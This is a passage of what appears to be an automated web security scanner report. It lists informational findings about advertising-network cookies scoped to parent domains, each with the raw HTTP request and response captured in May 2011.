Cookie: icu=ChIIhboCEAoYASABKAEwnZSg7gQQnZSg7gQYAA..; acb933293=5_[r^kI/7Zw[-!!0nf8MAYR8I?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jPzF8xuA56TROSsYda6b2ziUdCshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAAFBABAgUCAAUAAAAA6yROvQAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955445%29%3Buf%28%27c%27%2C+61473%2C+1304955445%29%3Buf%28%27r%27%2C+272040%2C+1304955445%29%3Bppv%287166%2C+%275635385468540845105%27%2C+1304955445%2C+1336491445%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0s(F?Mc9aQ3p9'^<S@I)Ql?!>Ae1f''iDi%3^'oLfC].kus@gU@%TxzHNX4[`WiVr*#9$vly>pFw2R!S3(%@w4<XPfGwI=KFxaLe[#mlK'C6EcG7hQU*o4SxrFd%j8zSG'hZ^D=OGMdEBEY11Uo_(eivJEYD@Ho?(^)etsLR7z'ns49!Ux5mR>#lMG'iLd<GTD$#AwtORJ@vBPA8q:p2Hv8s$nLSw`@cT6'=rqvg/PJyYt[-L!L(s`](-sRB6bA$j7/8l`/qMkYNHmLjx!j+Cat8-(!nXx8T`oWuF:Y11:LvJSN%2pSV-#:g'=Sb.-<6h+YEM%gG@w_9^gcM7pD=!j6CenGiB7>kko?i=<)!e3YI4KDvQEb`X8)alPKr$ETqBnzTMkQg+%-)erfq'IW*l8wrT7cUm4]3SP4j+tx.U-$'YUm@*y6x(A3H+*S0$getvNu.MeHeUf-#2%G*>DY/A<By?VIzutD*g8cKK+`6>[DwWqbhOid^wC>`:mn[J>?-#Fp6<W)3Xikw.$@ePbWiO6d:_'xt%OTZIzzfW[Loft(ZmLx[_-MtHVG'T'sPt9ssVv3fjt4@6bcwvH%-]h'oo`t?2P/4nA!gq([Ift!^HL*Xe]Z0f#*hQ*v9^cJiiW^]P3'vI-$iNx:M

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb933293=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIhboCEAoYAiACKAIw-pSg7gQQ-pSg7gQYAQ..; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb976848=5_[r^kI/7Zw[-!!0nf8M`P4+Q?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jP-kewMldWkJ_SsYda6b2ziV6CshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAA7w4BAgUCAAUAAAAAMiaD7wAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955522%29%3Buf%28%27c%27%2C+61473%2C+1304955522%29%3Buf%28%27r%27%2C+272040%2C+1304955522%29%3Bppv%287166%2C+%279169991150143020777%27%2C+1304955522%2C+1336491522%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; path=/; expires=Tue, 10-May-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0s(F?MZ/Hw6M9'^<S2U@!:?!=5D/#m45DLc)]:#m<jG2QY%)hRUPZ6.4!Cb0i9=?30.f`PjN%)NSM//kC0GfkcGYCO$HhF^d['nn-tv@#2kF)yOv%i`W#'w@pXWlbX@KozXV?P%j2mWi''mY$RtWOF<qF)@r6l88[dN]UG=Cg'6e=Kr)o.lNx7D2455k84Xt8<q%R/M)Q=p!SOLo6tu%S_EeJ^:GYD4TUGhUm4.CNgIbZX.*re6y<W$9sinfkZpOX#nFRnlBD8wa<kDbX0b$=`p+d7!7BSY%A(+T1-o5S0z_Rd^<NMU_QC#:#.T^Pf$7NQIiv+vrUEZz?ev<SSWGAY$oK=Fv^a5y+e@0%>@s0.tp=06u`%C+I55#E`PitRt]Iybk+9_<RyC)=CdC*pD7Y?1ZyJIf.Td9aL+-m+X9eObnVw>-bFl([SwBJV$s(QxCPo=+Hxahx8F%6Up#-z[(vtS^9b>:Y8LjKq]1lgr4Gt2k:9?S<LQEXV.U+CsRZJJxfIcVy9O)ng(G7oG70.Svvb9D?J[!8F3#h)nmsRq!pN'v!t1(Wv+o8q!ljeG$lzm7.mX(XqI/.5#cJ*npWOxe@WJc(:Z?Glrik<f#h=MRDu^$G7q]fKvLsX*@iq2ohfr2k*HmPV[x.bB)wC$/+le_]y; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 15:38:34 GMT
Content-Length: 756

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rub_usatoday/;net=cm;u=,cm-49643098_1304955489,11f8f328940989e,weath,ax.40-am.h-am.b-cm.ent_h-cm.music_h-cm.weath
...[SNIP]...

10.28. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=101339&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_VsdNmQotNi@m4]2M2UNvB^a*m(qsP<$5Y8+$btG4Ak815t9uZT9Y!Tss2(U=u08T#U*@.xf`p:/Y=@C'V`%3VDqSpO@2LNZ!a`mkrE=4S%OOWjxx?I%f.`8P<Q_=:K!N$S@p'W+mpx*RcdvEi=A'#X@PH+HTK.^[b/a`!b`#0B@$kf.F^2QqXMVbeza'$l/3mV)X=JbA6Dg2elt<r$Y2-LH'3+IRb[FhsHCNft/g2g4RKbYm([]%2pZmoc2O!J^AMCh5bcwNx(n]g=GtY31<eFv=Py[$vPQoKQvElD]jJ?WfA/mkYXJ7^YX%RfRfRP:B4Z:9)LOWaVQ._BYWVIt9SF3qfRr>MH2W4cYAiW:f92EX!%l#-=WZMff'fhbMApWS<YV1Fhq@f^5^1!7tcd#9Tdp::!P@XBy<13HmsxW[=X*.JJZAZnXKfBb0ZkTQDm.8h6r:GEYo'apKW77#x>UomXwbCI8b[s00xdd5UEfSDB=f<o'@gNUP)v6ITb?O-]le_)Ef0+aq9aCbvK/[`(!X92Jj!xp88_699MG!SR'2XPaU>9U<.1_BU7EhhEGpC$Dl]#Jj1o$JVk<kds/pZAV[23<*Wg2v^crt$`<vw8HjZ)4K>b:4bVPY; path=/; expires=Sun, 07-Aug-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly
Location: http://tags.bluekai.com/site/3775
Date: Mon, 09 May 2011 15:35:46 GMT
Content-Length: 0


10.29. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=073b4702-bd65-4b9a-ba5b-edcd599ebdea HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260&10654=734265; domain=.interclick.com; expires=Sun, 09-May-2021 15:37:51 GMT; path=/
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:37:50 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;

10.30. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc4JnRsPTE1NzY4MDA=&piggybackCookie=uid:2724386019227846218 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; KADUSERCOOKIE=29E43D8F-52C5-4C7B-B2EA-0181496E6671; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:10 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889; domain=pubmatic.com; expires=Thu, 01-May-2014 17:54:49 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

10.31. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=media27_cs=1&betq=13111=435181 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=BUGCI3kAAAAAYm1CAEAA+DABAAAABAAAAIAA+DA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uvWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAno2C+ORAgA1G!; C2=thAyN5pqDIxFGfkovMg3sYM7SKMCItdhrhQ3WX4aIsY4FuGCw3ghrhQ7NY4aIoLOGuGCKGehrhwmhX4aI8eDGuGCdDmhrhwohX4aIQY4FuGCYimhrhA3Wa4aIoa4FuGCA9qhrhgdeZ4aI4fFGuGCbTehrhwKOa4aIoN5FuGCC9qhrhwtZa4aIE0rGuGCFBqhrhQTaa4aIY4dGuGCNLqhrVrqDoxsGzetrSQIzaIGRGABg2cRBZm5IaAqxOCBsRpBZ0I9IsfzFA3i4SQBwWcSltCqGFFseSw7RaAWVSPBrLqxJNJUEQT2FgFruTQAzZAW0KHBbzqBYl6BE8sXGgFogRwrgYU3zWdBkoqxrM67FcNNGPWkAbwuRXETumvBEOpx5NLUGsEpGTIq+bQoeZwifOsBgwhhyW7/HUJtGBRZpTrRIFqFH09IGZUo8ew5qYASY6wBsMihlcAnjaYJHEv9FWSqGdQ9fZA1FirZDugRgELJI8GlGT0s2hA8kaAc; GUID=MTMwNDk1NDk4OTsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:36:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=3nAyN5pqDIxFGekovMg3sYI7SKMCItdRrhQ3WX0aIsY4FtGCw3gRrhQ7NY0aIoLOGtGCKGeRrhwmhX0aI8eDGtGCdDmRrhwohX0aIQY4FtGCYimRrhA3Wa0aIoa4FtGCA9qRrhgdeZ0aI4fFGtGCbTeRrhwKOa0aIoN5FtGCC9qRrhwtZa0aIE0rGtGCFBqRrhQTaa0aIY4dGtGCNLqRrVrqDoxsGyetrSQIzaEGRGABg2cBBZm5Ia8pxOCBsRpxY0I9IsfzF/2i4SQBwWYSltCqGEFseSw7Ra8VVSPBrLqhJNJUEQT2FfFruTQAzZ8V0KHBbzqxXl6BE8sXGfFogRwrgYQ3zWdBkoqhrM67FcNNGOWkAbwuRXATumvBEOph5NLUGsEpGSIq+bQoeZsifOsBgwhRyW7/HUJtGARZpTrBIFqFH09IGYUo8ew5qY8RY6wBsMiRlcAnjaUJHEv9FVSqGdQ9fZ80FirZDugBgELJI8GlGS0s2hA8ka8bzeDCtPqBwB; domain=advertising.com; expires=Wed, 08-May-2013 15:36:23 GMT; path=/
Set-Cookie: GUID=MTMwNDk1NTM4MzsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Wed, 08-May-2013 15:36:23 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 09 May 2011 16:36:23 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

10.32. http://map.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=6169&pcv=48&cb=8467213627&topHref=http%3A%2F%2Fwww.csmonitor.com%2FBusiness HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt11400gxzt1tr37xzt1tr37xzt11400gxzt113zye; adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh1443x0113l040k0450n; rdrlst=41y157rlklhm4000000083l04157olkxlm5000000033l0315holkxlm5000000033l0315sklkkpqq0000000g3l040m7alkkxrb0000000d3l040x1blkkpqq0000000g3l040hsplkkpqq0000000g3l040m7flkkyyl0000000b3l0412gdlkkyy00000000c3l04148ilkxlm5000000033l030morlkkxrb0000000d3l0414k6lkxlm5000000033l0314rwlkxlm5000000033l031196lkkkbe0000000m3l0414khlkxlm5000000033l031195lkkpqh0000000h3l041194lkkjj40000000n3l040dlxlkb5u20000000r3l0416nulkxlm5000000033l0314hplkxlm5000000033l030znmlk34620000000w3l0414hclkxlm5000000033l031193lkkplo0000000j3l041192lkkpke0000000l3l040p46lkkpqq0000000g3l04008slklhm4000000083l0416oilkxlm5000000033l030moylkl0r5000000093l040p1blkb5u20000000r3l0410tylkkpku0000000k3l0400bvlk9pe80000000s3l0415xylk60qe0000000v3l0410poljyxb40000000y3l040e6llkl0r5000000093l0410telkd7nq0000000q3l0416rslkxppm000000013l010c9slk9pe80000000s3l0410rdlkdkly0000000o3l040mj2lkkxrb0000000d3l0414qllkxlm5000000033l03159olk8fax0000000t3l0415halkxlm5000000033l030kualkkpqq0000000g3l04163plkxlm5000000033l030m0ulkl0r5000000093l040m45lkl0r5000000093l040m0plkkxrb0000000d3l040m40lkkxrb0000000d3l0416e6lkxnbq000000023l020mjelkkxrb0000000d3l0414xnlkxlm5000000033l0312qnlkkplt0000000i3l04167blkl0r5000000093l040bo8lkb5u20000000r3l040mjjlkl0r5000000093l041672lkkxrb0000000d3l040lw5lkb5u20000000r3l040ycrlkncow000000073l0415k9lkxlm5000000033l0316atlkxlm5000000033l031203lkb5u20000000r3l04163clkxlm5000000033l03137rlkkpqq0000000g3l041204lkkyy00000000c3l040o0vlkkpqx0000000f3l0414ozlkxlm5000000033l0314j7lkxlm5000000033l0314bzlkxlm5000000033l030z2ilkkxrb0000000d3l040ni1lkb5u20000000r3l04; sglst=2280sbpelkxlm5000000033l030k03503dsnlkxlm5000000033l030k03503arllkxlm5000000033l030k03503cg5lkxlm5000000033l030k035039rslkkpke0cw1r00l3l040k0450lam5lkkxr8002zw00e3l040k0450ecd4lkxlm5000000033l030k03503crglkxlm5000000033l030k03503cnolkxlm5000000033l030k03503abelkxlm5000000033l030k03503dd8lkxlm5000000033l030k03503cy2lkxlm5000000033l030k03503aoplkb5u209jqc0063e000j00500cnxlkxlm5000000033l030k03503bq3lkxlm5000000033l030k03503aoilkxlm5000000033l030k03503bvplkxlm5000000033l030k03503942lkb5u20mfs300o3l000k005009ullkxlm5000000033l030k035038ndlkb5u20mfs300o3l000k00500bvclkxlm5000000033l030k03503c5flkxlm5000000033l030k0350356blkb5u20mfs300o3l000k00500bjqlkxlm5000000033l030k03503awklkxlm5000000033l030k03503asulkb5u209jqc0063e000j00500crplkxlm5000000033l030k03503asqlkxlm5000000033l030k03503c5rlkov6e000000063l040k04506aw8lkxlm5000000033l030k03503c60lkxlm5000000033l030k03503dc4lkxlm5000000033l030k03503d26lkxlm5000000033l030k03503dnjlkxlm5000000033l030k03503brilkxlm5000000033l030k03503cbclkxlm5000000033l030k03503c85lkxlm5000000033l030k03503csslkxlm5000000033l030k03503c80lkb5u209jqc0063e000j00500ag2lkd7nq0ki1w00q3l040k0450nc1elkxlm5000000033l030k03503c81lkkpke0cw1r00i3l000k005009grlkxlm5000000033l030k03503c8flkxlm5000000033l030k03503a6slkkpke0cw1r00i3l000k00500dnalkxlm5000000033l030k035039z6lkxlm5000000033l030k03503dbtlkxlm5000000033l030k035039q4lkxlm5000000033l030k035030kllklhm40c4010053l000k00500dyllkxlm5000000033l030k03503b3zlkxlm5000000033l030k035039q5lkb5u20mfs300o3l000k005009mjlkxlm5000000033l030k03503dgflkkpke0cw1r00l3l040k0450l0t7ljyxb40ysei00y3l040k0450nbo0lkb5u20mfs300r3l040k0450nbo1lkkyy00cmo50093l000k005009pglkxlm5000000033l030k03503d86lklhm40c4010053l000k00500cwalkxlm5000000033l030k03503dqllkxlm5000000033l030k03503d84lkxlm5000000033l030k03503dz3lkxlm5000000033l030k03503cm6lkxlm5000000033l030k03503cxdlkxlm5000000033l030k03503719lkb5u20mfs30093l030k0350471alkkpke0cw1r00i3l000k00500ctplkxlm5000000033l030k03503cc3lkxlm5000000033l030k03503dgilkb5u209jqc0063e000j00500cthlkxlm5000000033l030k035034wclkb5u20mfs30093l030k03504a0ulkxlm5000000033l030k035035mrlkb5u20mfs300o3l000k005008eklkkpke0cw1r00i3l000k00500arilkxlm5000000033l030k03503cbplkxlm5000000033l030k03503bwjlkkyy00cmo500c3l040k0450c9gelkxlm5000000033l030k03503; vstcnt=417k010r154exp6103210e24tc6l103210e24ru4y1032107249v4u10pj10e22te10tq10a24tmhw103210924f69z103210f24pq44103210a24n86o103210d24eflo218e104203210724eyja103210e24na8i103210e24mqca103210e24nsyl103210f24jxig103210f24f9wk103210i24fvio218e20e20f203210f24uzpw118e10f24l16a118e10f24fz24103210924e8bw103210824fsuv103210924fduc218e10a203210e24uzdp103210b24dret103210724gqhl103210923sti21hj10a203210e2451gt10pj10e24styu103210924cnyl103210g24o2lt103210a24fj52103210924nnav103210f24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b23l4f103210a24kd6k103210c24hqyp103210i2

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 15:35:19 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh144d60123l050k0550o; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 15:35:19 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=41z157rlklhm4000000093l05157olkxlm5000000043l0415holkxlm5000000043l0415sklkkpqq0000000h3l050m7alkkxrb0000000e3l050x1blkkpqq0000000h3l050hsplkkpqq0000000h3l050m7flkkyyl0000000c3l0512gdlkkyy00000000d3l05148ilkxlm5000000043l040morlkkxrb0000000e3l0514k6lkxlm5000000043l0414rwlkxlm5000000043l0414khlkxlm5000000043l041196lkkkbe0000000n3l051195lkkpqh0000000i3l051194lkkjj40000000o3l050dlxlkb5u20000000s3l0516s2lkxpyv000000013l0114hplkxlm5000000043l0416nulkxlm5000000043l040znmlk34620000000x3l0514hclkxlm5000000043l041193lkkplo0000000k3l050p46lkkpqq0000000h3l051192lkkpke0000000m3l05008slklhm4000000093l0516oilkxlm5000000043l040moylkl0r50000000a3l050p1blkb5u20000000s3l0510tylkkpku0000000l3l0500bvlk9pe80000000t3l0515xylk60qe0000000w3l0510poljyxb40000000z3l050e6llkl0r50000000a3l0510telkd7nq0000000r3l0516rslkxppm000000023l020c9slk9pe80000000t3l0510rdlkdkly0000000p3l050mj2lkkxrb0000000e3l0514qllkxlm5000000043l04159olk8fax0000000u3l0515halkxlm5000000043l040kualkkpqq0000000h3l05163plkxlm5000000043l040m0ulkl0r50000000a3l050m45lkl0r50000000a3l050m0plkkxrb0000000e3l050m40lkkxrb0000000e3l0516e6lkxnbq000000033l030mjelkkxrb0000000e3l0512qnlkkplt0000000j3l0514xnlkxlm5000000043l04167blkl0r50000000a3l050bo8lkb5u20000000s3l050mjjlkl0r50000000a3l051672lkkxrb0000000e3l050lw5lkb5u20000000s3l050ycrlkncow000000083l0516atlkxlm5000000043l0415k9lkxlm5000000043l041203lkb5u20000000s3l051204lkkyy00000000d3l05137rlkkpqq0000000h3l05163clkxlm5000000043l040o0vlkkpqx0000000g3l0514ozlkxlm5000000043l0414j7lkxlm5000000043l0414bzlkxlm5000000043l040z2ilkkxrb0000000e3l050ni1lkb5u20000000s3l05; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 15:35:19 GMT; Path=/
